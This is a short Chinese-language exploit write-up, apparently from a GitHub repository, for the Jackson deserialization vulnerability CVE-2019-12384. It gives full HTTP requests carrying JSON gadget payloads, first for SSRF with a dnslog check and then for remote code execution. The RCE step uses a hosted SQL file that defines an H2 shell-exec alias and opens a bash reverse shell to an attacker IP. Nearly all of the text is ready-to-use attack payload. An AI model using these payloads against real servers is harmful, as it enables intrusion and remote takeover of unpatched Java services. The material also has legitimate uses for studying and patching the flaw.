Skip to content

Latest commit

 

History

History
64 lines (44 loc) · 1.76 KB

CVE-2019-12384 jackson ssrf-rce(附exp脚本).md

File metadata and controls

64 lines (44 loc) · 1.76 KB

CVE-2019-12384 jackson ssrf-rce(附exp脚本)

1、ssrf:

POST /fuckme HTTP/1.1
Host: 192.168.136.131:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://192.168.136.129:7777/"}]

或者直接使用dnslog验证:

poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://jcqfpe.dnslog.cn/"}]

2、RCE:

首先在vps上放置一个.sql的文件,内容如下:

CREATE ALIAS SHELLEXEC AS $ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$;
CALL SHELLEXEC('bash -i >& /dev/tcp/192.168.136.129/7777 0>&1')

然后发送payload,请求远程的sql文件,进行RCE

POST /fuckme HTTP/1.1
Host: 192.168.136.131:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 164

poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.136.129/exp.sql'"}]

via:Mosen